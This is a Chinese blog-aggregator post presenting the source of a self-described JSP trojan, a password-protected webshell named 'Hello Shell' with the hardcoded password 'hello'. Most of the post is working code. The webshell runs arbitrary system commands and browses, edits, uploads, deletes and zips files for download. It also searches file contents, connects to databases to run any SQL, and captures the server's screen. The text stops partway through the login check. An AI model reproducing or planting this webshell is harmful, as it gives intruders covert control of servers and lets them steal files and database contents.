漂亮的JSP木马

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了漂亮的JSP木马相关的知识,希望对你有一定的参考价值。

纯碎手痒,写一个jsp木马。代码如下:

   1 <%@ page contentType="text/html; charset=utf-8"%>
   2 <%@ page import="java.io.*"%>
   3 <%@ page import="java.util.*"%>
   4 <%@ page import="java.nio.charset.Charset"%>
   5 <%@ page import="java.util.regex.*"%>
   6 <%@ page import="java.sql.*"%>
   7 <%@ page import="java.util.zip.ZipEntry"%>
   8 <%@ page import="java.util.zip.ZipOutputStream"%>
   9 <%@ page import="java.text.DecimalFormat"%>
  10 <%@ page import="java.net.InetAddress"%>
  11 <%@ page import="java.awt.Dimension"%>
  12 <%@ page import="java.awt.Toolkit"%>
  13 <%@ page import="java.awt.image.BufferedImage"%>
  14 <%@ page import="java.awt.Rectangle"%>
  15 <%@ page import="java.awt.Robot"%>
  16 <%@ page import="javax.imageio.ImageIO"%>
  17 <%!
  18     /*
  19      * Code by Kenn
  20      * QQ: 921506
  21      */
  22     private String myPassword = "hello";
  23     private String shellName = "Hello Shell"; //title
  24     /*
  25     * 骷髅标志:\\u2620   星月标志:\\u262a 外星人标志:\\ud83d\\udc7d
  26     */
  27     private String loginIcon = "\\u2620";
  28     private int sessionOutTime = 30; //minutes
  29     private static String language = "ENG"; //default language: ENG or CHN;
  30     private String encodeType = "utf8";
  31     //welcome info of login page
  32     public static String welcomeMsg(){
  33         return orChinese("Welcome for coming","你丫又来了");
  34     }
  35 
  36     private enum Operation{Edit,Delete,Rename,Download;}
  37     private String curPath;
  38     private boolean isDBconnected = false;
  39     private Connection conn = null;
  40     private Statement dbStatement = null;
  41 
  42     private static Map<String,String> textMap = null;
  43     
  44     static{
  45         initMap();
  46     }
  47 
  48     public static void initMap(){
  49         if (textMap==null){
  50             textMap = new HashMap<String,String>();
  51             textMap.put("Environment", "系统环境");
  52             textMap.put("File Manager", "文件管理");
  53             textMap.put("File Search", "文件搜索");
  54             textMap.put("Command", "命令行");
  55             textMap.put("Database", "数据库");
  56             textMap.put("Screen Capture", "屏幕采集");
  57             textMap.put("Logoff", "退出");
  58             textMap.put("OS", "操作系统");
  59             textMap.put("Computer Name", "计算机名");
  60             textMap.put("Available Processors", "处理器可用核心数");
  61             textMap.put("IP", "IP地址");
  62             textMap.put("System Driver", "系统盘符");
  63             textMap.put("Driver Info", "磁盘信息");
  64             textMap.put("User Name", "用户名");
  65             textMap.put("User DNS Domain", "用户域");
  66             textMap.put("User Domain", "帐户的域名称");
  67             textMap.put("User Profile", "用户目录");
  68             textMap.put("All User Profile", "用户公共目录");
  69             textMap.put("Temp", "用户临时文件目录");
  70             textMap.put("Program Files", "默认程序目录");
  71             textMap.put("AppData", "应用程序数据目录");
  72             textMap.put("System Root", "系统启动目录");
  73             textMap.put("Console", "控制台");
  74             textMap.put("File Executable", "可执行后缀");
  75             textMap.put("My Path", "本程序绝对路径");
  76             textMap.put("User Dir", "当前用户工作目录");
  77             textMap.put("Protocol", "网络协议");
  78             textMap.put("Server Info", "服务器软件版本信息");
  79             textMap.put("JDK Version", "JDK版本");
  80             textMap.put("JDK Home", "JDK安装路径");
  81             textMap.put("JVM Version", "JAVA虚拟机版本");
  82             textMap.put("JVM Name", "JAVA虚拟机名");
  83             textMap.put("Class Path", "JAVA类路径");
  84             textMap.put("Java Library Path", "JAVA载入库搜索路径");
  85             textMap.put("Java tmpdir", "JAVA临时目录");
  86             textMap.put("Compiler", "JIT编译器名");
  87             textMap.put("Java ext dirs", "扩展目录路径");
  88             textMap.put("Remote Addr", "客户机地址");
  89             textMap.put("Remote Host", "客户机器名");
  90             textMap.put("Remote User", "客户机用户名");
  91             textMap.put("Scheme", "请求方式");
  92             textMap.put("Secure", "应用安全套接字层");
  93             textMap.put("Yes", "");
  94             textMap.put("No", "");
  95             textMap.put("Edit", "编辑");
  96             textMap.put("Delete", "删除");
  97             textMap.put("Rename", "重命名");
  98             textMap.put("Download", "下载");
  99             textMap.put("File Name", "文件名");
 100             textMap.put("Size", "大小");
 101             textMap.put("Operation", "操作");
 102             textMap.put("GOTO", "跳转");
 103             textMap.put("Home", "家目录");
 104             textMap.put("Select", "选择");
 105             textMap.put("Upload", "上传");
 106             textMap.put("Create File", "创建文件");
 107             textMap.put("Create Folder", "创建文件夹");
 108             textMap.put("Wrong Password","密码错误");
 109             textMap.put("Folder name is null","文件夹名为空");
 110             textMap.put("Content is null","内容为空");
 111             textMap.put("File name is null","文件名为空");
 112             textMap.put("Search from","搜索目录");
 113             textMap.put("Search for file type","文件的后缀名");
 114             textMap.put("Setting","设置");
 115             textMap.put("Search by Name","按名称搜索");
 116             textMap.put("Search by Content","按内容搜索");
 117             textMap.put("Ignore Case","忽略大小写");
 118             textMap.put("Search keyword","关键词");
 119             textMap.put("Search","搜索");
 120             textMap.put("Execute","执行");
 121             textMap.put("Connect","连接");
 122             textMap.put("Disconnect","断开");
 123             textMap.put("Database Type","数据库类型");
 124             textMap.put("Driver","驱动程序");
 125             textMap.put("Host","主机地址");
 126             textMap.put("Port","端口号");
 127             textMap.put("DB Name","数据库名");
 128             textMap.put("Username","用户名");
 129             textMap.put("Password","密码");
 130             textMap.put("SQL","SQL语句");
 131             textMap.put("File is already exist","文件已存在");
 132             textMap.put("Folder is empty","文件夹为空");
 133             textMap.put("Bad command","错误的命令");
 134             textMap.put("Save","保存");
 135             textMap.put("Return Back","返回");
 136             textMap.put("is not a text file","不是文本文件");
 137             textMap.put("File can not be writed","文件不可写");
 138             textMap.put("Save success","保存成功");
 139             textMap.put("Exception","异常");
 140             textMap.put("Folder already exist","文件夹已存在");
 141             textMap.put("File already exist","文件已存在");
 142             textMap.put("File upload success","文件上传成功");
 143             textMap.put("File upload failed","文件上传失败");
 144             textMap.put("connect failed","连接失败");
 145             textMap.put("connect success","连接成功");
 146             textMap.put("Can not connect to database","不能连接到数据库");
 147             textMap.put("Invalid SQL","无效的SQL");
 148             textMap.put("result","结果");
 149             textMap.put("SQL execute failed","SQL执行失败");
 150             textMap.put("SQL execute success","SQL执行成功");
 151             textMap.put("Free, Total","可用,共");
 152             textMap.put("Please input new name","请输入新的名字");
 153             textMap.put("Name can not be null","名字不可为空");
 154             textMap.put("Refresh","刷新");
 155         }
 156     }
 157     public static String orChinese(String key){
 158         return "CHN".equalsIgnoreCase(language)
 159                 ? textMap.get(key)
 160                 : key;
 161     }
 162     public static String orChinese(String english, String chinese){
 163         textMap.put(english, chinese);
 164         return orChinese(english);
 165     }
 166     public List<File> getFolderList(String path) {
 167         List<File> rtnList = new ArrayList<File>();
 168         File file = new File(path);
 169         if (file.exists() && file.isDirectory()) {
 170             File[] listFiles = file.listFiles(new FileFilter() {
 171                 public boolean accept(File pathname) {
 172                     return pathname.isDirectory();
 173                 }
 174             });
 175             rtnList.addAll(Arrays.asList(listFiles));
 176         }
 177         return rtnList;
 178     }
 179 
 180     public List<File> getFileList(String path) {
 181         List<File> rtnList = new ArrayList<File>();
 182         File file = new File(path);
 183         if (file.exists() && file.isDirectory()) {
 184             File[] listFiles = file.listFiles(new FileFilter() {
 185                 public boolean accept(File pathname) {
 186                     return pathname.isFile();
 187                 }
 188             });
 189             rtnList.addAll(Arrays.asList(listFiles));
 190         }
 191         return rtnList;
 192     }
 193 
 194     public class MyFile extends File {
 195 
 196         private String htmlOperation;
 197         private String requestUrl;
 198 
 199         public MyFile(String pathname, String requestUrl) {
 200             super(pathname);
 201             this.requestUrl = requestUrl;
 202         }
 203 
 204         public String getHtmlOperation() {
 205             return htmlOperation;
 206         }
 207 
 208         public void setHtmlOperation(Operation... Opers) {
 209             this.htmlOperation = "";
 210             for (Operation o : Opers) {
 211                 if (o.equals(Operation.Rename)) {
 212                     String url = requestUrl + "&fsAction=" + o + "&fileName=" + this.getName();
 213                     htmlOperation += "&nbsp;<a href=\\"#\\" onclick=\\"rename(" + url + "‘,‘"
 214                             + orChinese("Please input new name") + "‘,‘" + orChinese("Name can not be null") + "‘)\\">"
 215                             + orChinese(o.toString()) + "</a>&nbsp;";
 216                 } else {
 217                     htmlOperation += "&nbsp;<a href=\\"" + requestUrl + "&fsAction=" + o + "&fileName=" + this.getName()
 218                             + "\\">" + orChinese(o.toString()) + "</a>&nbsp;";
 219                 }
 220             }
 221         }
 222 
 223         public String getLength() {
 224             if (this.isDirectory())
 225                 return "";
 226             return getSize(this.length());
 227         }
 228     }
 229 
 230     public static String getSize(long size) {
 231         DecimalFormat df = new DecimalFormat("0.00");
 232         if (size >> 40 >= 1)
 233             return df.format((float) size / 1024 / 1024 / 1024 / 1024) + " TB";
 234         if (size >> 30 >= 1)
 235             return df.format((float) size / 1024 / 1024 / 1024) + " GB";
 236         else if (size >> 20 >= 1)
 237             return df.format((float) size / 1024 / 1024) + " MB";
 238         else if (size >> 10 >= 1)
 239             return df.format((float) size / 1024) + " KB";
 240         else
 241             return df.format((float) size) + " B ";
 242     }
 243 
 244     public void download(String path, HttpServletResponse response) throws Exception {
 245         try {
 246             File file = new File(path);
 247             String filename = file.getName();
 248             String ext = filename.substring(filename.lastIndexOf(".") + 1).toUpperCase();
 249             InputStream fis = new BufferedInputStream(new FileInputStream(path));
 250             byte[] buffer = new byte[fis.available()];
 251             fis.read(buffer);
 252             fis.close();
 253             response.reset();
 254             response.addHeader("Content-Disposition",
 255                     "attachment;filename=" + new String(filename.getBytes(), "ISO-8859-1"));
 256             response.addHeader("Content-Length", "" + file.length());
 257             OutputStream toClient = new BufferedOutputStream(response.getOutputStream());
 258             response.setContentType("application/octet-stream");
 259             toClient.write(buffer);
 260             toClient.flush();
 261             toClient.close();
 262         } catch (IOException ex) {
 263             throw ex;
 264         }
 265     }
 266 
 267     public static File createZip(String sourcePath, String zipPath) throws Exception {
 268         FileOutputStream fos = null;
 269         ZipOutputStream zos = null;
 270         try {
 271             File zipFile = new File(zipPath);
 272             if (zipFile.exists()) {
 273                 throw new Exception(orChinese("File is already exist") + ": " + zipFile.getName());
 274             }
 275             File srcFolder = new File(sourcePath);
 276             if (!srcFolder.exists() || srcFolder.listFiles().length == 0) {
 277                 throw new Exception(orChinese("Folder is empty") + ": " + srcFolder.getName());
 278             }
 279             fos = new FileOutputStream(zipPath);
 280             zos = new ZipOutputStream(fos);
 281             writeZip(new File(sourcePath), "", zos);
 282             return zipFile;
 283         } catch (Exception e) {
 284             throw e;
 285         } finally {
 286             try {
 287                 if (zos != null)
 288                     zos.close();
 289                 if (fos != null)
 290                     fos.close();
 291             } catch (Exception e) {
 292                 throw e;
 293             }
 294         }
 295     }
 296 
 297     private static void writeZip(File file, String parentPath, ZipOutputStream zos) throws Exception {
 298         if (!file.exists())
 299             return;
 300         if (file.isDirectory()) {
 301             parentPath += file.getName() + File.separator;
 302             File[] files = file.listFiles();
 303             for (File f : files) {
 304                 writeZip(f, parentPath, zos);
 305             }
 306         } else {
 307             FileInputStream fis = null;
 308             DataInputStream dis = null;
 309             try {
 310                 fis = new FileInputStream(file);
 311                 dis = new DataInputStream(new BufferedInputStream(fis));
 312                 ZipEntry ze = new ZipEntry(parentPath + file.getName());
 313                 zos.putNextEntry(ze);
 314                 byte[] content = new byte[1024];
 315                 int len;
 316                 while ((len = fis.read(content)) != -1) {
 317                     zos.write(content, 0, len);
 318                     zos.flush();
 319                 }
 320             } catch (Exception e) {
 321                 throw e;
 322             } finally {
 323                 try {
 324                     if (dis != null)
 325                         dis.close();
 326                     if (fis != null)
 327                         fis.close();
 328                 } catch (Exception e) {
 329                     throw e;
 330                 }
 331             }
 332         }
 333     }
 334 
 335     public String exeCmd(String cmd) {
 336         Runtime runtime = Runtime.getRuntime();
 337         Process proc = null;
 338         String retStr = "";
 339         InputStreamReader insReader = null;
 340         char[] tmpBuffer = new char[1024];
 341         int nRet = 0;
 342 
 343         try {
 344             proc = runtime.exec(cmd);
 345             insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
 346 
 347             while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
 348                 retStr += new String(tmpBuffer, 0, nRet) + "\\n";
 349             }
 350             insReader.close();
 351             retStr = HTMLEncode(retStr);
 352             return retStr;
 353         } catch (Exception e) {
 354             retStr = "<font color=\\"red\\">" + orChinese("Bad command") + ": \\"" + cmd + "\\"</font>";
 355             return retStr;
 356         }
 357     }
 358 
 359     public String HTMLEncode(String str) {
 360         str = str.replaceAll(" ", "&nbsp;");
 361         str = str.replaceAll("<", "&lt;");
 362         str = str.replaceAll(">", "&gt;");
 363         str = str.replaceAll("\\r\\n", "<br>");
 364         return str;
 365     }
 366 
 367     public String Unicode2GB(String str) {
 368         String sRet = null;
 369         if (str == null)
 370             return "";
 371         try {
 372             sRet = new String(str.getBytes("ISO8859_1"), encodeType);
 373         } catch (Exception e) {
 374             sRet = str;
 375         }
 376 
 377         return sRet;
 378     }
 379 
 380     public String pathConvert(String path) {
 381         String sRet = path.replace(\\\\‘, ‘/‘);
 382         File file = new File(path);
 383         if (file.getParent() != null) {
 384             if (file.isDirectory()) {
 385                 if (!sRet.endsWith("/"))
 386                     sRet += "/";
 387             }
 388         } else {
 389             if (!sRet.endsWith("/"))
 390                 sRet += "/";
 391         }
 392         return sRet;
 393     }
 394 
 395     public String searchFile(String path, String content, String subfix, boolean byname, boolean ignoreCase) {
 396         List<String> list = new ArrayList<String>();
 397         searchFile(list, path, content, subfix, byname, ignoreCase);
 398         StringBuilder sb = new StringBuilder();
 399         for (String line : list) {
 400             sb.append(line.replace("\\\\", "/") + "<br>");
 401         }
 402         return sb.toString();
 403     }
 404 
 405     private void searchFile(List<String> list, String path, String content, String subfix, boolean byname,
 406             boolean ignoreCase) {
 407         path = pathConvert(path);
 408         File dir = new File(path);
 409         if (dir.exists() && dir.isDirectory()) {
 410             if (dir.list() != null && dir.list().length > 0) {
 411                 for (File f : dir.listFiles()) {
 412                     if (!f.isDirectory()) {
 413                         String fname = f.getName();
 414                         String srcStr = f.getName();
 415                         if (containsSubfix(fname, subfix.split(" "))) {
 416                             if (!byname) {
 417                                 srcStr = readText(f);
 418                             }
 419                             if (ignoreCase) {
 420                                 content = content.toUpperCase();
 421                                 srcStr = srcStr.toUpperCase();
 422                             }
 423                             if (srcStr.contains(content)) {
 424                                 list.add(f.getAbsolutePath());
 425                             }
 426                         }
 427                     } else {
 428                         searchFile(list, f.getAbsolutePath(), content, subfix, byname, ignoreCase);
 429                     }
 430                 }
 431             }
 432         }
 433     }
 434 
 435     private boolean containsSubfix(String name, String[] subfixs) {
 436         boolean rtn = false;
 437         if (subfixs == null || subfixs.length == 0)
 438             return rtn;
 439         for (String ext : subfixs) {
 440             if (name.toUpperCase().endsWith(ext.toUpperCase())) {
 441                 rtn = true;
 442             }
 443         }
 444         return rtn;
 445     }
 446 
 447     public static String readText(File file) {
 448         StringBuilder sb = new StringBuilder();
 449         BufferedReader reader = null;
 450         try {
 451             reader = new BufferedReader(new InputStreamReader(new FileInputStream(file), "GB2312"));
 452             String str = null;
 453             while ((str = reader.readLine()) != null) {
 454                 sb.append(str);
 455             }
 456         } catch (Exception e) {
 457             e.printStackTrace();
 458         } finally {
 459             try {
 460                 reader.close();
 461             } catch (Exception e) {
 462                 e.printStackTrace();
 463             }
 464         }
 465         return sb.toString();
 466 
 467     }
 468 
 469     public String openFile(String path, String fileName, String curUri) {
 470         String sRet = "";
 471         String fileString = null;
 472         File curFile = null;
 473         path = pathConvert(path);
 474         try {
 475             fileString = "";
 476             curFile = new File(path, fileName);
 477             FileReader fileReader = new FileReader(curFile);
 478             char[] chBuffer = new char[1024];
 479             int nRet;
 480             while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) {
 481                 fileString += new String(chBuffer, 0, nRet);
 482             }
 483             if (fileString != null) {
 484                 sRet += "<table align=\\"center\\" width=\\"100%\\" cellpadding=\\"2\\" cellspacing=\\"1\\">\\n";
 485                 sRet += "    <form name=\\"openfile\\" method=\\"post\\" action=\\"" + curUri + "&curPath=" + path
 486                         + "&fsAction=save" + "\\">\\n";
 487                 sRet += "    <input type=\\"hidden\\" name=\\"fileName\\" value=\\"" + fileName + "\\" />\\n";
 488                 sRet += "    <tr>\\n";
 489                 sRet += "        <td>[<a href=\\"" + curUri + "&curPath=" + pathConvert(curFile.getParent()) + "\\">"
 490                         + orChinese("Return Back") + "</a>]</td>\\n";
 491                 sRet += "    </tr>\\n";
 492                 sRet += "    <tr>\\n";
 493                 sRet += "        <td align=\\"left\\">\\n";
 494                 sRet += "            <textarea name=\\"fileContent\\" class=\\"trans\\" style=\\"display:block;width:100%\\" rows=\\"32\\" >\\n";
 495                 sRet += HTMLEncode(fileString).replace("<br>", "\\r\\n");
 496                 sRet += "            </textarea>\\n";
 497                 sRet += "        </td>\\n";
 498                 sRet += "    </tr>\\n";
 499                 sRet += "    <tr>\\n";
 500                 sRet += "        <td align=\\"center\\"><input type=\\"submit\\" class=\\"trans\\" value=\\""
 501                         + orChinese("Save") + "\\" /></td>\\n";
 502                 sRet += "    </tr>\\n";
 503                 sRet += "    </form>\\n";
 504                 sRet += "</table>\\n";
 505             }
 506             fileReader.close();
 507         } catch (IOException e) {
 508             sRet = "<font color=\\"red\\">\\"" + path + "\\" " + orChinese("is not a text file") + "</font>";
 509         }
 510         return sRet;
 511     }
 512 
 513     public String saveFile(String path, String fileName, String curUri, String fileContent) {
 514         String sRet = "";
 515         File file = null;
 516 
 517         path = pathConvert(path);
 518 
 519         try {
 520             file = new File(path, fileName);
 521 
 522             if (!file.canWrite()) {
 523                 sRet = "<font color=\\"red\\">" + orChinese("File can not be writed") + "</font>";
 524             } else {
 525                 FileWriter fileWriter = new FileWriter(file);
 526                 fileWriter.write(fileContent);
 527 
 528                 fileWriter.close();
 529                 sRet = orChinese("Save success") + "!\\n";
 530                 sRet += "<meta http-equiv=\\"refresh\\" content=\\"1;url=" + curUri + "&curPath=" + path
 531                         + "&fsAction=list\\" />\\n";
 532             }
 533         } catch (IOException e) {
 534             sRet = "<font color=\\"red\\">" + orChinese("Exception") + ": " + e.getMessage() + "</font>";
 535         }
 536         return sRet;
 537     }
 538 
 539     public String createFolder(String path, String fileName, String url) {
 540         try {
 541             File file = new File(path, fileName);
 542             if (file.exists())
 543                 return orChinese("Folder already exist") + "!";
 544             else
 545                 file.mkdirs();
 546         } catch (Exception e) {
 547             return "<font color=\\"red\\">" + orChinese("Exception") + ": " + e.getMessage() + "</font>";
 548         }
 549         return "<meta http-equiv=\\"refresh\\" content=\\"0;url=" + url + "&curPath=" + path + "&fsAction=list\\" />";
 550     }
 551 
 552     public String createFile(String path, String fileName, String url) {
 553         try {
 554             File file = new File(path, fileName);
 555             if (file.exists())
 556                 return orChinese("File already exist") + "!";
 557             else
 558                 file.createNewFile();
 559         } catch (Exception e) {
 560             return "<font color=\\"red\\">" + orChinese("Exception") + ": " + e.getMessage() + "</font>";
 561         }
 562         return "<meta http-equiv=\\"refresh\\" content=\\"0;url=" + url + "&curPath=" + path + "&fsAction=list\\" />";
 563     }
 564 
 565     public String deleteFile(String path, String fileName, String url) {
 566         File file = new File(path, fileName);
 567         if (file.exists())
 568             file.delete();
 569         return "<meta http-equiv=\\"refresh\\" content=\\"0;url=" + url + "&curPath=" + path + "&fsAction=list\\" />";
 570     }
 571 
 572     public String download(String path, String fileName, String url, HttpServletResponse response) {
 573         String rtnStr = "";
 574         File file = new File(path, fileName);
 575         File downFile = null;
 576         if (!file.exists())
 577             return null;
 578         try {
 579             if (file.isDirectory()) {
 580                 file = createZip(file.getAbsolutePath(), file.getAbsolutePath() + ".zip");
 581             }
 582             download(file.getAbsolutePath(), response);
 583         } catch (Exception e) {
 584             rtnStr = e.getMessage();
 585         }
 586         return rtnStr;
 587     }
 588 
 589     public String rename(String path, String fileName, String newFile, String url) {
 590         File file = new File(path, fileName);
 591         File nFile = new File(path, newFile);
 592         if (file.exists()) {
 593             file.renameTo(nFile);
 594         }
 595         return "<meta http-equiv=\\"refresh\\" content=\\"0;url=" + url + "&curPath=" + path + "&fsAction=list\\" />";
 596     }
 597 
 598     public String uploadFile(ServletRequest request, String path, String curUri) {
 599         String sRet = "";
 600         File file = null;
 601         InputStream in = null;
 602         path = pathConvert(path);
 603         try {
 604             in = request.getInputStream();
 605             byte[] inBytes = new byte[request.getContentLength()];
 606             int nBytes;
 607             int start = 0;
 608             int end = 0;
 609             int size = 1024;
 610             String token = null;
 611             String filePath = null;
 612             while ((nBytes = in.read(inBytes, start, size)) != -1) {
 613                 start += nBytes;
 614             }
 615             in.close();
 616             int i = 0;
 617             byte[] seperator;
 618 
 619             while (inBytes[i] != 13) {
 620                 i++;
 621             }
 622             seperator = new byte[i];
 623 
 624             for (i = 0; i < seperator.length; i++) {
 625                 seperator[i] = inBytes[i];
 626             }
 627             String dataHeader = null;
 628             i += 3;
 629             start = i;
 630             while (!(inBytes[i] == 13 && inBytes[i + 2] == 13)) {
 631                 i++;
 632             }
 633             end = i - 1;
 634             dataHeader = new String(inBytes, start, end - start + 1);
 635             token = "filename=\\"";
 636             start = dataHeader.indexOf(token) + token.length();
 637             token = "\\"";
 638             end = dataHeader.indexOf(token, start) - 1;
 639             filePath = dataHeader.substring(start, end + 1);
 640             i += 4;
 641             start = i;
 642             end = inBytes.length - 1 - 2 - seperator.length - 2 - 2;
 643             File newFile = new File(path + filePath);
 644             newFile.createNewFile();
 645             FileOutputStream out = new FileOutputStream(newFile);
 646             out.write(inBytes, start, end - start + 1);
 647             out.close();
 648 
 649             sRet = "<script language=\\"javascript\\">\\n";
 650             sRet += "alert(\\"" + orChinese("File upload success") + "! " + filePath + "\\");\\n";
 651             sRet += "</script>\\n";
 652         } catch (IOException e) {
 653             sRet = "<script language=\\"javascript\\">\\n";
 654             sRet += "alert(\\"" + orChinese("File upload failed") + "!\\");\\n";
 655             sRet += "</script>\\n";
 656         }
 657 
 658         sRet += "<meta http-equiv=\\"refresh\\" content=\\"0;url=" + curUri + "&curPath=" + path + "\\" />";
 659         return sRet;
 660     }
 661 
 662     public String DBConnect(String url, String username, String password) {
 663         String bRet = orChinese("connect failed");
 664         if (url != null) {
 665             try {
 666                 if (username != null && username.trim().length() > 0) {
 667                     conn = DriverManager.getConnection(url, username, password);
 668                 } else {
 669                     conn = DriverManager.getConnection(url);
 670                 }
 671                 dbStatement = conn.createStatement();
 672                 bRet = orChinese("connect success");
 673             } catch (SQLException e) {
 674                 bRet = orChinese("connect failed") + ": " + e.getMessage();
 675             }
 676         }
 677         return bRet;
 678     }
 679 
 680     public String DBExecute(String sql) {
 681         String sRet = "";
 682         if (sql == null)
 683             return "SQL is null";
 684         if (conn == null || dbStatement == null) {
 685             sRet = "<font color=\\"red\\">" + orChinese("Can not connect to database") + "</font>";
 686         } else {
 687             try {
 688                 if (sql.length() <= 6)
 689                     return "<font color=\\"red\\">" + orChinese("Invalid SQL") + "</font>";
 690                 if (sql.toLowerCase().substring(0, 6).equals("select")) {
 691                     ResultSet rs = dbStatement.executeQuery(sql);
 692                     ResultSetMetaData rsmd = rs.getMetaData();
 693                     int colNum = rsmd.getColumnCount();
 694                     int colType;
 695 
 696                     sRet = orChinese("SQL execute success") + ", " + orChinese("result") + ":<br>\\n";
 697                     sRet += "<table align=\\"center\\" border=\\"0\\" cellpadding=\\"2\\" cellspacing=\\"1\\">\\n";
 698                     sRet += "    <tr>\\n";
 699                     for (int i = 1; i <= colNum; i++) {
 700                         sRet += "        <th>" + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ")</th>\\n";
 701                     }
 702                     sRet += "    </tr>\\n";
 703                     while (rs.next()) {
 704                         sRet += "    <tr>\\n";
 705                         for (int i = 1; i <= colNum; i++) {
 706                             colType = rsmd.getColumnType(i);
 707 
 708                             sRet += "        <td>";
 709                             switch (colType) {
 710                             case Types.BIGINT:
 711                                 sRet += rs.getLong(i);
 712                                 break;
 713 
 714                             case Types.BIT:
 715                                 sRet += rs.getBoolean(i);
 716                                 break;
 717 
 718                             case Types.BOOLEAN:
 719                                 sRet += rs.getBoolean(i);
 720                                 break;
 721 
 722                             case Types.CHAR:
 723                                 sRet += rs.getString(i);
 724                                 break;
 725 
 726                             case Types.DATE:
 727                                 sRet += rs.getDate(i).toString();
 728                                 break;
 729 
 730                             case Types.DECIMAL:
 731                                 sRet += rs.getDouble(i);
 732                                 break;
 733 
 734                             case Types.NUMERIC:
 735                                 sRet += rs.getDouble(i);
 736                                 break;
 737 
 738                             case Types.REAL:
 739                                 sRet += rs.getDouble(i);
 740                                 break;
 741 
 742                             case Types.DOUBLE:
 743                                 sRet += rs.getDouble(i);
 744                                 break;
 745 
 746                             case Types.FLOAT:
 747                                 sRet += rs.getFloat(i);
 748                                 break;
 749 
 750                             case Types.INTEGER:
 751                                 sRet += rs.getInt(i);
 752                                 break;
 753 
 754                             case Types.TINYINT:
 755                                 sRet += rs.getShort(i);
 756                                 break;
 757 
 758                             case Types.VARCHAR:
 759                                 sRet += rs.getString(i);
 760                                 break;
 761 
 762                             case Types.TIME:
 763                                 sRet += rs.getTime(i).toString();
 764                                 break;
 765 
 766                             case Types.DATALINK:
 767                                 sRet += rs.getTimestamp(i).toString();
 768                                 break;
 769                             }
 770                             sRet += "        </td>\\n";
 771                         }
 772                         sRet += "    </tr>\\n";
 773                     }
 774                     sRet += "</table>\\n";
 775 
 776                     rs.close();
 777                 } else {
 778                     if (dbStatement.execute(sql)) {
 779                         sRet = orChinese("SQL execute success");
 780                     } else {
 781                         sRet = "<font color=\\"red\\">" + orChinese("SQL execute failed") + "</font>";
 782                     }
 783                 }
 784             } catch (SQLException e) {
 785                 sRet = "<font color=\\"red\\">" + orChinese("SQL execute failed") + "</font>";
 786             }
 787         }
 788 
 789         return sRet;
 790     }
 791 
 792     private void getScreenImg(HttpServletRequest request, HttpServletResponse response) throws Exception {
 793         try{
 794             response.reset();
 795             response.setContentType("image/jpg");
 796             ServletOutputStream sos = response.getOutputStream();
 797             response.setHeader("Pragma", "No-cache");
 798             response.setHeader("Cache-Control", "no-cache");
 799             response.setDateHeader("Expires", 0);
 800             Dimension dimension = Toolkit.getDefaultToolkit().getScreenSize();
 801             BufferedImage screenshot = (new Robot())
 802                     .createScreenCapture(new Rectangle(0, 0, (int) dimension.getWidth(), (int) dimension.getHeight()));
 803             ByteArrayOutputStream bos = new ByteArrayOutputStream();
 804             ImageIO.write(screenshot, "jpg", bos);
 805             byte[] buf = bos.toByteArray();
 806             response.setContentLength(buf.length);
 807             sos.write(buf);
 808             bos.close();
 809             sos.close();
 810         }catch(Exception e){
 811         }
 812     }
 813 
 814     public String getDriverInfo() {
 815         String str = "";
 816         File[] roots = File.listRoots();
 817         for (File file : roots) {
 818             str += file.getPath() + "&nbsp;(";
 819             str += getSize(file.getFreeSpace()) + " " + orChinese("Free, Total") + " ";
 820             str += getSize(file.getTotalSpace()) + ")<br>";
 821         }
 822         return str;
 823     }%>
 824 
 825 <html>
 826 <head>
 827 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
 828 <style>
 829 body {font-size: 14px;font-family: &#23435; &#20307; ;color: white;background-color: black;text-align: center;padding: 5 5 5 5;}
 830 .trans {background: transparent;margin: 1 1 1 1;color: white;}
 831 input.textbox {border: black solid 1;font-size: 12px;height: 18px;}
 832 textarea {border: black solid 1;}
 833 table {border-collapse: collapse;}
 834 table.onhover tr:hover{background:red;}
 835 td {border: 1px dotted #FFF;height: 18px;}
 836 .break-all {word-break: break-all;}
 837 .oper {display: inline-block;float: left;width: 130px;border: 1px dotted #FFF;padding: 5px;margin-right: 3px;margin-bottom: 15px;height: 18px;cursor: hand;}
 838 .container {position: absolute;margin: 2 2 2 2;top: 68px;width: 95%;}
 839 a:link, a:visited {text-decoration: none;color: #FFF;}
 840 a:hover {text-decoration: underline;color: #FFF;}
 841 
 842 </style>
 843 <script type="text/JavaScript">
 844     var pressKey = function() {
 845         if (event.keyCode == 13) {
 846             event.returnValue = false;
 847             event.cancel = true;
 848             loginForm.submit();
 849         }
 850     }
 851     var redirect = function(action) {
 852         var actionOption = document.getElementById(actionOption);
 853         actionOption.value = action;
 854         actionForm.submit();
 855     }
 856     var createFile = function(url){
 857         var filename = document.getElementById(createFileName);
 858         window.location.href = url + "&fileName=" + filename.value;
 859     }
 860     var rename = function(url, msg, errormsg){
 861         var result = prompt(msg + "" ,"")
 862         if (result){
 863             window.location.href=url + "&newName=" + result;
 864         }else{
 865             alert(errormsg);
 866         }
 867     }
 868     var dbsubmit = function(fsAction){
 869         var form = document.getElementById("sqlform");
 870         form.action  += "&fsAction=" + fsAction;
 871         document.getElementById("sqlform").submit();
 872     }
 873     var languageChanged = function(url , oldurl){
 874         oldurl = oldurl.replace("&","{{and}}").replace("?","{{question}}");
 875         url = url + "&oldurl=" + oldurl;
 876         window.location.href = url;
 877     }
 878 </script>
 879 <title><%=shellName %></title>
 880 </head>
 881 <body>
 882     <%
 883         session.setMaxInactiveInterval(sessionOutTime * 60);
 884         if (request.getParameter("myPassword") == null && session.getAttribute("myPassword") == null) {
 885             if (request.getParameter("lang") !=null){
 886                 language = request.getParameter("lang");
 887                 String oldurl = request.getParameter("oldurl");
 888                 String str = "<meta http-equiv=\\"refresh\\" content=\\"0;url="+oldurl+"\\" />";
 889                 out.println(str);
 890                 out.flush();
 891             }
 892     %>
 893     <font style="font-size: 300px; color: white"><% out.println(loginIcon); %></font>
 894     <form name="loginForm">
 895         <font size=4><%=welcomeMsg() %></font><br><br>
 896         <input class="textbox" size="30" name="myPassword" type="password" onkeydown="pressKey()" />
 897     </form>
 898     <%
 899         } else {
 900             String password = null;
 901             if (session.getAttribute("myPassword") == null) {
 902                 password = (String) request.getParameter("myPassword");
 903                 if (!myPassword.equals(password)) {
